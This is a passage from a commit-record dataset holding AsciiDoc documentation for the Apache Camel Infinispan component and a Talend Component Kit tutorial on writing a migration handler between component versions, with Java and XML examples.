skeleton that implements the necessary methods is shown below: \n[source,java,options=\"nowrap\"]\n----\nimport org.infinispan.notifications.cachelistener.filter;\n\n@NamedFactory(name = \"static-converter-factory\")\npublic static class StaticConverterFactory implements CacheEventConverterFactory {\n @Override\n public CacheEventConverter<Integer, String, CustomEvent> getConverter(Object[] params) {\n ...\n }\n\n static class StaticConverter implements CacheEventConverter<Integer, String, CustomEvent>, Serializable {\n @Override\n public CustomEvent convert(Integer key, String previousValue, Metadata previousMetadata, \n String value, Metadata metadata, EventType eventType) {\n ...\n }\n }\n}\n \n@NamedFactory(name = \"static-filter-factory\")\npublic static class StaticCacheEventFilterFactory implements CacheEventFilterFactory {\n @Override\n public CacheEventFilter<Integer, String> getFilter(final Object[] params) {\n ...\n }\n\n static class StaticCacheEventFilter implements CacheEventFilter<Integer, String>, Serializable {\n @Override\n public boolean accept(Integer key, String previousValue, Metadata previousMetadata, \n String value, Metadata metadata, EventType eventType) {\n ...\n }\n }\n}\n----\n\nCustom filters and converters must be registered with the server.\n. \n\n[NOTE]\n====\nIn order to listen for remote HotRod events the cacheManager must be of type [class]``RemoteCacheManager`` and instantiated. \n====\n\n\n\n== Using the Infinispan based idempotent repository\n\nIn this section we will use the Infinispan based idempotent repository.\n\nFirst, we need to create a cacheManager and then configure our\n\n[source,java]\n----\norg.apache.camel.component.infinispan.processor.idempotent.InfinispanIdempotentRepository:\n----\n\n[source,xml]\n----\n<!-- set up the cache manager -->\n<bean id=\"cacheManager\"\n class=\"org.infinispan.manager.DefaultCacheManager\"\n init-method=\"start\"\n destroy-method=\"stop\"\/>\n\n<!-- set up the repository -->\n<bean id=\"infinispanRepo\"\n class=\"org.apache.camel.component.infinispan.processor.idempotent.InfinispanIdempotentRepository\"\n factory-method=\"infinispanIdempotentRepository\">\n <argument ref=\"cacheManager\"\/>\n <argument value=\"idempotent\"\/>\n<\/bean>\n----\n\nThen we can create our Infinispan idempotent repository in the spring\nXML file as well:\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route id=\"JpaMessageIdRepositoryTest\">\n <from uri=\"direct:start\" \/>\n <idempotentConsumer messageIdRepositoryRef=\"infinispanStore\">\n <header>messageId<\/header>\n <to uri=\"mock:result\" \/>\n <\/idempotentConsumer>\n <\/route>\n<\/camelContext>\n----\n\n== See Also\n\n* Configuring Camel\n* Component\n* Endpoint\n* Getting Started\n","old_contents":"[[infinispan-component]]\n= Infinispan Component\n\n*Available as of Camel version 2.13*\n\nThis component allows you to interact with\nhttp:\/\/infinispan.org\/[Infinispan] distributed data grid \/ cache.\nInfinispan is an extremely scalable, highly available key\/value data\nstore and data grid platform written in Java.\n\nInfinispan requires at least Java 8.\n\nMaven users will need to add the following dependency to their `pom.xml`\nfor this component:\n\n[source,xml]\n------------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-infinispan<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n------------------------------------------------------------\n\n== URI format\n\n[source,java]\n-------------------------------\ninfinispan:\/\/cacheName?[options]\n-------------------------------\n\n== URI Options\n\nThe producer allows sending messages to a local infinispan cache\nconfigured in the registry, or to a remote cache using the HotRod\nprotocol. The consumer allows listening for events from local infinispan cache\naccessible from the registry.\n\n\n\/\/ component options: START\nThe Infinispan component supports 4 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *configuration* (common) | The default configuration shared among endpoints. | | InfinispanConfiguration\n| *cacheContainer* (common) | The default cache container. | | BasicCacheContainer\n| *resolveProperty Placeholders* (advanced) | Whether the component should resolve property placeholders on itself when starting. Only properties which are of String type can use property placeholders. | true | boolean\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n|===\n\/\/ component options: END\n\n\n\n\n\/\/ endpoint options: START\nThe Infinispan endpoint is configured using URI syntax:\n\n----\ninfinispan:cacheName\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *cacheName* | *Required* The cache to use | | String\n|===\n\n\n=== Query Parameters (21 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *hosts* (common) | Specifies the host of the cache on Infinispan instance | | String\n| *queryBuilder* (common) | Specifies the query builder. | | InfinispanQueryBuilder\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *clusteredListener* (consumer) | If true, the listener will be installed for the entire cluster | false | boolean\n| *command* (consumer) | *Deprecated* The operation to perform. | PUT | String\n| *customListener* (consumer) | Returns the custom listener in use, if provided | | InfinispanCustom Listener\n| *eventTypes* (consumer) | Specifies the set of event types to register by the consumer. Multiple event can be separated by comma. The possible event types are: CACHE_ENTRY_ACTIVATED, CACHE_ENTRY_PASSIVATED, CACHE_ENTRY_VISITED, CACHE_ENTRY_LOADED, CACHE_ENTRY_EVICTED, CACHE_ENTRY_CREATED, CACHE_ENTRY_REMOVED, CACHE_ENTRY_MODIFIED, TRANSACTION_COMPLETED, TRANSACTION_REGISTERED, CACHE_ENTRY_INVALIDATED, DATA_REHASHED, TOPOLOGY_CHANGED, PARTITION_STATUS_CHANGED | | String\n| *sync* (consumer) | If true, the consumer will receive notifications synchronously | true | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | The operation to perform. | PUT | InfinispanOperation\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *cacheContainer* (advanced) | Specifies the cache Container to connect | | BasicCacheContainer\n| *cacheContainerConfiguration* (advanced) | The CacheContainer configuration. Uses if the cacheContainer is not defined. Must be the following types: org.infinispan.client.hotrod.configuration.Configuration - for remote cache interaction configuration; org.infinispan.configuration.cache.Configuration - for embedded cache interaction configuration; | | Object\n| *configurationProperties* (advanced) | Implementation specific properties for the CacheManager | | Map\n| *configurationUri* (advanced) | An implementation specific URI for the CacheManager | | String\n| *flags* (advanced) | A comma separated list of Flag to be applied by default on each cache invocation, not applicable to remote caches. | | String\n| *remappingFunction* (advanced) | Set a specific remappingFunction to use in a compute operation | | BiFunction\n| *resultHeader* (advanced) | Store the operation result in a header instead of the message body. By default, resultHeader == null and the query result is stored in the message body, any existing content in the message body is discarded. If resultHeader is set, the value is used as the name of the header to store the query result and the original message body is preserved. This value can be overridden by an in message header named: CamelInfinispanOperationResultHeader | | Object\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n== Spring Boot Auto-Configuration\n\nWhen using Spring Boot make sure to use the following Maven dependency to have support for auto configuration:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-infinispan-starter<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n\nThe component supports 23 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.infinispan.basic-property-binding* | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | Boolean\n| *camel.component.infinispan.cache-container* | The default cache container. The option is a org.infinispan.commons.api.BasicCacheContainer type. | | String\n| *camel.component.infinispan.configuration.cache-container* | Specifies the cache Container to connect | | BasicCacheContainer\n| *camel.component.infinispan.configuration.cache-container-configuration* | The CacheContainer configuration. Uses if the cacheContainer is not defined. Must be the following types: org.infinispan.client.hotrod.configuration.Configuration - for remote cache interaction configuration; org.infinispan.configuration.cache.Configuration - for embedded cache interaction configuration; | | Object\n| *camel.component.infinispan.configuration.clustered-listener* | If true, the listener will be installed for the entire cluster | false | Boolean\n| *camel.component.infinispan.configuration.configuration-properties* | Implementation specific properties for the CacheManager | | Map\n| *camel.component.infinispan.configuration.configuration-uri* | An implementation specific URI for the CacheManager | | String\n| *camel.component.infinispan.configuration.custom-listener* | Returns the custom listener in use, if provided | | InfinispanCustom Listener\n| *camel.component.infinispan.configuration.event-types* | Specifies the set of event types to register by the consumer. Multiple event can be separated by comma. <p\/> The possible event types are: CACHE_ENTRY_ACTIVATED, CACHE_ENTRY_PASSIVATED, CACHE_ENTRY_VISITED, CACHE_ENTRY_LOADED, CACHE_ENTRY_EVICTED, CACHE_ENTRY_CREATED, CACHE_ENTRY_REMOVED, CACHE_ENTRY_MODIFIED, TRANSACTION_COMPLETED, TRANSACTION_REGISTERED, CACHE_ENTRY_INVALIDATED, DATA_REHASHED, TOPOLOGY_CHANGED, PARTITION_STATUS_CHANGED | | Set\n| *camel.component.infinispan.configuration.flags* | A comma separated list of Flag to be applied by default on each cache invocation, not applicable to remote caches. | | Flag[]\n| *camel.component.infinispan.configuration.hosts* | Specifies the host of the cache on Infinispan instance | | String\n| *camel.component.infinispan.configuration.operation* | The operation to perform. | | InfinispanOperation\n| *camel.component.infinispan.configuration.query-builder* | Specifies the query builder. | | InfinispanQueryBuilder\n| *camel.component.infinispan.configuration.remapping-function* | Set a specific remappingFunction to use in a compute operation | | BiFunction\n| *camel.component.infinispan.configuration.result-header* | Store the operation result in a header instead of the message body. By default, resultHeader == null and the query result is stored in the message body, any existing content in the message body is discarded. If resultHeader is set, the value is used as the name of the header to store the query result and the original message body is preserved. This value can be overridden by an in message header named: CamelInfinispanOperationResultHeader | | Object\n| *camel.component.infinispan.configuration.sync* | If true, the consumer will receive notifications synchronously | true | Boolean\n| *camel.component.infinispan.customizer.embedded-cache-manager.enabled* | Enable or disable the cache-manager customizer. | true | Boolean\n| *camel.component.infinispan.customizer.embedded-cache-manager.override* | Configure if the cache manager eventually set on the component should be overridden by the customizer. | false | Boolean\n| *camel.component.infinispan.customizer.remote-cache-manager.enabled* | Enable or disable the cache-manager customizer. | true | Boolean\n| *camel.component.infinispan.customizer.remote-cache-manager.override* | Configure if the cache manager eventually set on the component should be overridden by the customizer. | false | Boolean\n| *camel.component.infinispan.enabled* | Enable infinispan component | true | Boolean\n| *camel.component.infinispan.resolve-property-placeholders* | Whether the component should resolve property placeholders on itself when starting. Only properties which are of String type can use property placeholders. | true | Boolean\n| *camel.component.infinispan.configuration.command* | *Deprecated* The operation to perform. | PUT | String\n|===\n\/\/ spring-boot-auto-configure options: END\n\n\n\n\n== Message Headers\n\n[width=\"100%\",cols=\"10%,10%,10%,10%,60%\",options=\"header\",]\n|=======================================================================\n|Name |Default Value |Type |Context |Description\n|CamelInfinispanCacheName |`null` |String |Shared |The cache participating in the operation or event.\n|CamelInfinispanOperation |`PUT` |InfinispanOperation |Producer |The operation to perform.\n|CamelInfinispanMap |`null` |Map |Producer |A Map to use in case of CamelInfinispanOperationPutAll operation\n|CamelInfinispanKey |`null` |Object |Shared |The key to perform the operation to or the key generating the event.\n|CamelInfinispanValue |`null` |Object |Producer |The value to use for the operation.\n|CamelInfinispanEventType |`null` |String |Consumer |The type of the received event. Possible values defined here org.infinispan.notifications.cachelistener.event.Event.Type\n|CamelInfinispanIsPre |`null` |Boolean |Consumer |Infinispan fires two events for each operation: one before and one after the operation.\n|CamelInfinispanLifespanTime |`null` |long |Producer |The Lifespan time of a value inside the cache. Negative values are interpreted as infinity.\n|CamelInfinispanTimeUnit |`null` |String |Producer |The Time Unit of an entry Lifespan Time.\n|CamelInfinispanMaxIdleTime |`null` |long |Producer |The maximum amount of time an entry is allowed to be idle for before it is considered as expired.\n|CamelInfinispanMaxIdleTimeUnit |`null` |String |Producer |The Time Unit of an entry Max Idle Time.\n|CamelInfinispanQueryBuilder |null |InfinispanQueryBuilder |Producer |The QueryBuilde to use for QUERY command, if not present the command defaults to InifinispanConfiguration's one\n|CamelInfinispanIgnoreReturnValues |null |Boolean |Producer |If this header is set, the return value for cache operation returning something is ignored by the client application\n|CamelInfinispanOperationResultHeader |null |String |Producer |Store the operation result in a header instead of the message body\n|=======================================================================\n\n== Examples\n\n* Retrieve a specific key from the default cache using a custom cache container:\n\n[source,java]\n----\nfrom(\"direct:start\")\n .setHeader(InfinispanConstants.OPERATION).constant(InfinispanOperation.GET)\n .setHeader(InfinispanConstants.KEY).constant(\"123\")\n .to(\"infinispan?cacheContainer=#cacheContainer\");\n----\n\n* Retrieve a specific key from a named cache:\n+\n[source,java]\n----\nfrom(\"direct:start\")\n .setHeader(InfinispanConstants.OPERATION).constant(InfinispanOperation.PUT)\n .setHeader(InfinispanConstants.KEY).constant(\"123\")\n .to(\"infinispan:myCacheName\");\n----\n\n* Put a value with lifespan\n\n[source,java]\n----\nfrom(\"direct:start\")\n .setHeader(InfinispanConstants.OPERATION).constant(InfinispanOperation.GET)\n .setHeader(InfinispanConstants.KEY).constant(\"123\")\n .setHeader(InfinispanConstants.LIFESPAN_TIME).constant(100L)\n .setHeader(InfinispanConstants.LIFESPAN_TIME_UNIT.constant(TimeUnit.MILLISECONDS.toString())\n .to(\"infinispan:myCacheName\");\n----\n\n* Compute operation through a remapping function on the default cache using a custom cache container:\n\n[source,java]\n----\n@BindToRegistry(\"mappingFunction\")\nBiFunction<String, String, String> comp = (k, v) -> v + \"replay\"; \n\nfrom(\"direct:start\")\n .setHeader(InfinispanConstants.OPERATION).constant(InfinispanOperation.COMPUTE)\n .setHeader(InfinispanConstants.KEY).constant(\"123\")\n .to(\"infinispan?cacheContainer=#cacheContainer&remappingFunction=#mappingFunction\");\n----\n\nThis will return oldValue + \"replay\".\n\nThis can be done also as async operation, with the `InfinispanOperation.COMPUTEASYNC` operation\n\n* Retrieve a specific key from the remote cache using a cache container configuration with additional parameters (host, port and protocol version):\n\n[source,java]\n----\norg.infinispan.client.hotrod.configuration.Configuration cacheContainerConfiguration = new org.infinispan.client.hotrod.configuration.ConfigurationBuilder()\n .addServer()\n .host(\"localhost\")\n .port(9999)\n .version(org.infinispan.client.hotrod.ProtocolVersion.PROTOCOL_VERSION_25)\n .build();\n...\n\nfrom(\"direct:start\")\n .setHeader(InfinispanConstants.OPERATION).constant(InfinispanOperation.GET)\n .setHeader(InfinispanConstants.KEY).constant(\"123\")\n .to(\"infinispan?cacheContainerConfiguration=#cacheContainerConfiguration\");\n----\n\n\n== Using the Infinispan based idempotent repository\n\nIn this section we will use the Infinispan based idempotent repository.\n\nFirst, we need to create a cacheManager and then configure our\n\n[source,java]\n----\norg.apache.camel.component.infinispan.processor.idempotent.InfinispanIdempotentRepository:\n----\n\n[source,xml]\n----\n<!-- set up the cache manager -->\n<bean id=\"cacheManager\"\n class=\"org.infinispan.manager.DefaultCacheManager\"\n init-method=\"start\"\n destroy-method=\"stop\"\/>\n\n<!-- set up the repository -->\n<bean id=\"infinispanRepo\"\n class=\"org.apache.camel.component.infinispan.processor.idempotent.InfinispanIdempotentRepository\"\n factory-method=\"infinispanIdempotentRepository\">\n <argument ref=\"cacheManager\"\/>\n <argument value=\"idempotent\"\/>\n<\/bean>\n----\n\nThen we can create our Infinispan idempotent repository in the spring\nXML file as well:\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route id=\"JpaMessageIdRepositoryTest\">\n <from uri=\"direct:start\" \/>\n <idempotentConsumer messageIdRepositoryRef=\"infinispanStore\">\n <header>messageId<\/header>\n <to uri=\"mock:result\" \/>\n <\/idempotentConsumer>\n <\/route>\n<\/camelContext>\n----\n\n== Using the Infinispan based route policy\n\n== See Also\n\n* Configuring Camel\n* Component\n* Endpoint\n* Getting Started\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"01f1d1bbe77f640b7f9bb3b5d778e09b34c64f46","subject":"Fix typo","message":"Fix typo","repos":"chmyga\/component-runtime,chmyga\/component-runtime,chmyga\/component-runtime,chmyga\/component-runtime","old_file":"documentation\/src\/main\/antora\/modules\/ROOT\/pages\/tutorial-handle-talend-component-migration.adoc","new_file":"documentation\/src\/main\/antora\/modules\/ROOT\/pages\/tutorial-handle-talend-component-migration.adoc","new_contents":"= Handling component version migration\n:page-partial:\n\n[[tutorial-handle-talend-component-migration]]\n\nTalend Component Kit provides a migration mechanism between two versions of a component to let you ensure backward compatibility.\n\nFor example, a new version of a component may have some new options that need to be remapped, set with a default value in the older versions, or disabled.\n\nThis tutorial shows how to create a migration handler for a component that needs to be upgraded from a version 1 to a version 2. The upgrade to the newer version includes adding new options to the component.\n\nThis tutorial assumes that you know xref:methodology-creating-components.adoc[the basics] about component development and are familiar with component project xref:index-generating-project.adoc[generation] and xref:index-creating-components.adoc[implementation].\n\n== Requirements\n\nTo follow this tutorial, you need:\n\n* Java 8\n* A Talend component development environment using Talend Component Kit. Refer to xref:system-prerequisites.adoc[this document].\n* Have generated a project containing a simple processor component using the Talend Component Kit Starter.\n\n\n== Creating the version 1 of the component\nFirst, create a simple processor component configured as follows:\n\n1. Create a simple configuration class that represents a basic authentication and that can be used in any component requiring this kind of authentication. +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@GridLayout({\n @GridLayout.Row({ \"username\", \"password\" })\n})\npublic class BasicAuth {\n\n @Option\n @Documentation(\"username to authenticate\")\n private String username;\n\n @Option\n @Credential\n @Documentation(\"user password\")\n private String password;\n}\n----\n\n[start=\"2\"]\n. Create a simple output component that uses the configuration defined earlier. The component configuration is injected into the component constructor. +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@Version(1)\n@Icon(Icon.IconType.DEFAULT)\n@Processor(name = \"MyOutput\")\n@Documentation(\"A simple output component\")\npublic class MyOutput implements Serializable {\n\n private final BasicAuth configuration;\n\n public MyOutput(@Option(\"configuration\") final BasicAuth configuration) {\n this.configuration = configuration;\n }\n\n @ElementListener\n public void onNext(@Input final JsonObject record) {\n }\n}\n----\n+\nNOTE: The version of the configuration class corresponds to the component version.\n\nBy configuring these two classes, the first version of the component is ready to use a simple authentication mechanism.\n\nNow, assuming that the component needs to support a new authentication mode following a new requirement, the next steps are:\n\n- Creating a version 2 of the component that supports the new authentication mode.\n- Handling migration from the first version to the new version.\n\n== Creating the version 2 of the component\nThe second version of the component needs to support a new authentication method and let the user choose the authentication mode he wants to use using a dropdown list.\n\n. Add an Oauth2 authentication mode to the component in addition to the basic mode. For example: +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@GridLayout({\n @GridLayout.Row({ \"clientId\", \"clientSecret\" })\n})\npublic class Oauth2 {\n\n @Option\n @Documentation(\"client id to authenticate\")\n private String clientId;\n\n @Option\n @Credential\n @Documentation(\"client secret token\")\n private String clientSecret;\n}\n----\nThe options of the new authentication mode are now defined.\n\n[start=\"2\"]\n. Wrap the configuration created above in a global configuration with the basic authentication mode and add an enumeration to let the user choose the mode to use. For example, create an `AuthenticationConfiguration` class as follows: +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@GridLayout({\n @GridLayout.Row({ \"authenticationMode\" }),\n @GridLayout.Row({ \"basic\" }),\n @GridLayout.Row({ \"oauth2\" })\n})\npublic class AuthenticationConfiguration {\n\n @Option\n @Documentation(\"the authentication mode\")\n private AuthMode authenticationMode = AuthMode.Oauth2; \/\/ we set the default value to the new mode\n\n @Option\n @ActiveIf(target = \"authenticationMode\", value = {\"Basic\"})\n @Documentation(\"basic authentication\")\n private BasicAuth basic;\n\n @Option\n @ActiveIf(target = \"authenticationMode\", value = {\"Oauth2\"})\n @Documentation(\"oauth2 authentication\")\n private Oauth2 oauth2;\n\n\n \/**\n * This enum holds the authentication mode supported by this configuration\n *\/\n public enum AuthMode {\n Basic,\n Oauth2;\n }\n}\n----\n+\nTIP: Using the `@ActiveIf` annotation allows to activate the authentication type according to the selected authentication mode.\n\n[start=\"3\"]\n. Edit the component to use the new configuration that supports an additional authentication mode.\nAlso upgrade the component version from 1 to 2 as its configuration has changed. +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@Version(2) \/\/ upgrade the component version\n@Icon(Icon.IconType.DEFAULT)\n@Processor(name = \"MyOutput\")\n@Documentation(\"A simple output component\")\npublic class MyOutput implements Serializable {\n\n private final AuthenticationConfiguration configuration; \/\/ use the new configuration\n\n public MyOutput(@Option(\"configuration\") final AuthenticationConfiguration configuration) {\n this.configuration = configuration;\n }\n\n @ElementListener\n public void onNext(@Input final JsonObject record) {\n }\n}\n----\n\nThe component now supports two authentication modes in its version 2.\nOnce the new version is ready, you can implement the migration handler that will take care of adapting the old configuration to the new one.\n\n== Handling the migration from the version 1 to the version 2\n\n*What can happen if an old configuration is passed to the new component version?*\n\nIt simply fails, as the version 2 does not recognize the old version anymore.\nFor that reason, a migration handler that adapts the old configuration to the new one is required.\nIt can be achieved by defining a migration handler class in the `@Version` annotation of the component class.\n\nNOTE: An old configuration may already be persisted by an application that integrates the version 1 of the component (Studio or web application).\n\n=== Declaring the migration handler\n\n. Add a migration handler class to the component version. +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@Version(value = 2, migrationHandler = MyOutputMigrationHandler.class)\n----\n\n[start=\"2\"]\n. Create the migration handler class `MyOutputMigrationHandler`. +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n public class MyOutputMigrationHandler implements MigrationHandler{ <1>\n\n @Override\n public Map<String, String> migrate(final int incomingVersion, final Map<String, String> incomingData) { <2>\n \/\/ Here we will implement our migration logic to adapt the version 1 of the component to the version 2\n return incomingData;\n }\n }\n----\n+\n<1> The migration handler class needs to implement the `MigrationHandler` interface.\n<2> The `MigrationHandler` interface specifies the `migrate` method. This method references: +\n+\n- the incoming version, which is the version of the configuration that we are migrating from\n- a map (key, value) of the configuration, where the key is the configuration path and the value is the value of the configuration.\n\n=== Implementing the migration handler\n\nNOTE: You need to be familiar with the component configuration path construction to better understand this part.\nRefer to xref:component-configuration.adoc[Defining component layout and configuration].\n\nAs a reminder, the following changes were made since the version 1 of the component:\n\n- The configuration `BasicAuth` from the version 1 is not the root configuration anymore, as it is under `AuthenticationConfiguration`.\n- `AuthenticationConfiguration` is the new root configuration.\n- The component supports a new authentication mode (Oauth2) which is the default mode in the version 2 of the component.\n\nTo migrate the old component version to the new version and to keep backward compatibility, you need to:\n\n- Remap the old configuration to the new one.\n- Give the adequate default values to some options.\n\nIn the case of this scenario, it means making all configurations based on the version 1 of the component have the `authenticationMode` set to basic by default and remapping the old basic authentication configuration to the new one.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n public class MyOutputMigrationHandler implements MigrationHandler{\n\n @Override\n public Map<String, String> migrate(final int incomingVersion, final Map<String, String> incomingData) {\n if(incomingVersion == 1){ <1>\n \/\/ remapping the old configuration <2>\n String userName = incomingData.get(\"configuration.username\");\n String password = incomingData.get(\"configuration.password\");\n incomingData.put(\"configuration.basic.username\", userName);\n incomingData.put(\"configuration.basic.password\", password);\n\n \/\/ setting default value for authenticationMode to Basic <3>\n incomingData.put(\"configuration.authenticationMode\", \"Basic\");\n }\n\n return incomingData; <4>\n }\n }\n----\n\n<1> Safety check of the incoming data version to make sure to only apply the migration logic to the version 1.\n<2> Mapping the old configuration to the new version structure. As the `BasicAuth` is now under the root configuration class, its path changes and becomes `configuration.basic.*`.\n<3> Setting a new default value to the `authenticationMode` as it needs to be set to `Basic` for configuration coming from version 1.\n<4> Returning the new configuration data.\n\nTIP: if a configuration has been renamed between 2 component versions, you can get the old configuration option from the configuration map by using its old path and set its value using its new path.\n\nYou can now upgrade your component without losing backward compatibility.\n","old_contents":"= Handling component version migration\n:page-partial:\n\n[[tutorial-handle-talend-component-migration]]\n\nTalend Component Kit provides a migration mechanism between two versions of a component to let you ensure backward compatibility.\n\nFor example, a new version of a component may have some new options that need to be remapped, set with a default value in the older versions, or disabled.\n\nThis tutorial shows how to create a migration handler for a component that needs to be upgraded from a version 1 to a version 2. The upgrade to the newer version includes adding new options to the component.\n\nThis tutorial assumes that you know xref:methodology-creating-components.adoc[the basics] about component development and are familiar with component project xref:index-generating-project.adoc[generation] and xref:index-creating-components.adoc[implementation].\n\n== Requirements\n\nTo follow this tutorial, you need:\n\n* Java 8\n* A Talend component development environment using Talend Component Kit. Refer to xref:system-prerequisites.adoc[this document].\n* Have generated a project containing a simple processor component using the Talend Component Kit Starter.\n\n\n== Creating the version 1 of the component\nFirst, create a simple processor component configured as follows:\n\n1. Create a simple configuration class that represents a basic authentication and that can be used in any component requiring this kind of authentication. +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@GridLayout({\n @GridLayout.Row({ \"username\", \"password\" })\n})\npublic class BasicAuth {\n\n @Option\n @Documentation(\"username to authenticate\")\n private String username;\n\n @Option\n @Credential\n @Documentation(\"user password\")\n private String password;\n}\n----\n\n[start=\"2\"]\n. Create a simple output component that uses the configuration defined earlier. The component configuration is injected into the component constructor. +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@Version(1)\n@Icon(Icon.IconType.DEFAULT)\n@Processor(name = \"MyOutput\")\n@Documentation(\"A simple output component\")\npublic class MyOutput implements Serializable {\n\n private final BasicAuth configuration;\n\n public MyOutput(@Option(\"configuration\") final BasicAuth configuration) {\n this.configuration = configuration;\n }\n\n @ElementListener\n public void onNext(@Input final JsonObject record) {\n }\n}\n----\n+\nNOTE: The version of the configuration class corresponds to the component version.\n\nBy configuring these two classes, the first version of the component is ready to use a simple authentication mechanism.\n\nNow, assuming that the component needs to support a new authentication mode following a new requirement, the next steps are:\n\n- Creating a version 2 of the component that supports the new authentication mode.\n- Handling migration from the first version to the new version.\n\n== Creating the version 2 of the component\nThe second version of the component needs to support a new authentication method and let the user choose the authentication mode he wants to use using a dropdown list.\n\n. Add an Oauth2 authentication mode to the component in addition to the basic mode. For example: +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@GridLayout({\n @GridLayout.Row({ \"clientId\", \"clientSecret\" })\n})\npublic class Oauth2 {\n\n @Option\n @Documentation(\"client id to authenticate\")\n private String clientId;\n\n @Option\n @Credential\n @Documentation(\"client secret token\")\n private String clientSecret;\n}\n----\nThe options of the new authentication mode are now defined.\n\n[start=\"2\"]\n. Wrap the configuration created above in a global configuration with the basic authentication mode and add an enumeration to let the user choose the mode to use. For example, create an `AuthenticationConfiguration` class as follows: +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@GridLayout({\n @GridLayout.Row({ \"authenticationMode\" }),\n @GridLayout.Row({ \"basic\" }),\n @GridLayout.Row({ \"oauth2\" })\n})\npublic class AuthenticationConfiguration {\n\n @Option\n @Documentation(\"the authentication mode\")\n private AuthMode authenticationMode = AuthMode.Oauth2; \/\/ we set the default value to the new mode\n\n @Option\n @ActiveIf(target = \"authenticationMode\", value = {\"Basic\"})\n @Documentation(\"basic authentication\")\n private BasicAuth basic;\n\n @Option\n @ActiveIf(target = \"authenticationMode\", value = {\"Oauth2\"})\n @Documentation(\"oauth2 authentication\")\n private Oauth2 oauth2;\n\n\n \/**\n * This enum holds the authentication mode supported by this configuration\n *\/\n public enum AuthMode {\n Basic,\n Oauth2;\n }\n}\n----\n+\nTIP: Using the `@ActiveIf` annotation allows to activate the authentication type according to the selected authentication mode.\n\n[start=\"3\"]\n. Edit the component to use the new configuration that supports an additional authentication mode.\nAlso upgrade the component version from 1 to 2 as its configuration has changed. +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@Version(2) \/\/ upgrade the component version\n@Icon(Icon.IconType.DEFAULT)\n@Processor(name = \"MyOutput\")\n@Documentation(\"A simple output component\")\npublic class MyOutput implements Serializable {\n\n private final AuthenticationConfiguration configuration; \/\/ use the new configuration\n\n public MyOutput(@Option(\"configuration\") final AuthenticationConfiguration configuration) {\n this.configuration = configuration;\n }\n\n @ElementListener\n public void onNext(@Input final JsonObject record) {\n }\n}\n----\n\nThe component now supports two authentication modes in its version 2.\nOnce the new version is ready, you can implement the migration handler that will take care of adapting the old configuration to the new one.\n\n== Handling the migration from the version 1 to the version 2\n\n*What can happen if an old configuration is passed to the new component version?*\n\nIt simply fails, as the version 2 does not recognize the old version anymore.\nFor that reason, a migration handler that adapts the old configuration to the new one is required.\nIt can be achieved by defining a migration handler class in the `@Version` annotation of the component class.\n\nNOTE: An old configuration may already be persisted by an application that integrates the version 1 of the component (Studio or web application).\n\n=== Declaring the migration handler\n\n. Add a migration handler class to the component version. +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@Version(value = 1, migrationHandler = MyOutputMigrationHandler.class)\n----\n\n[start=\"2\"]\n. Create the migration handler class 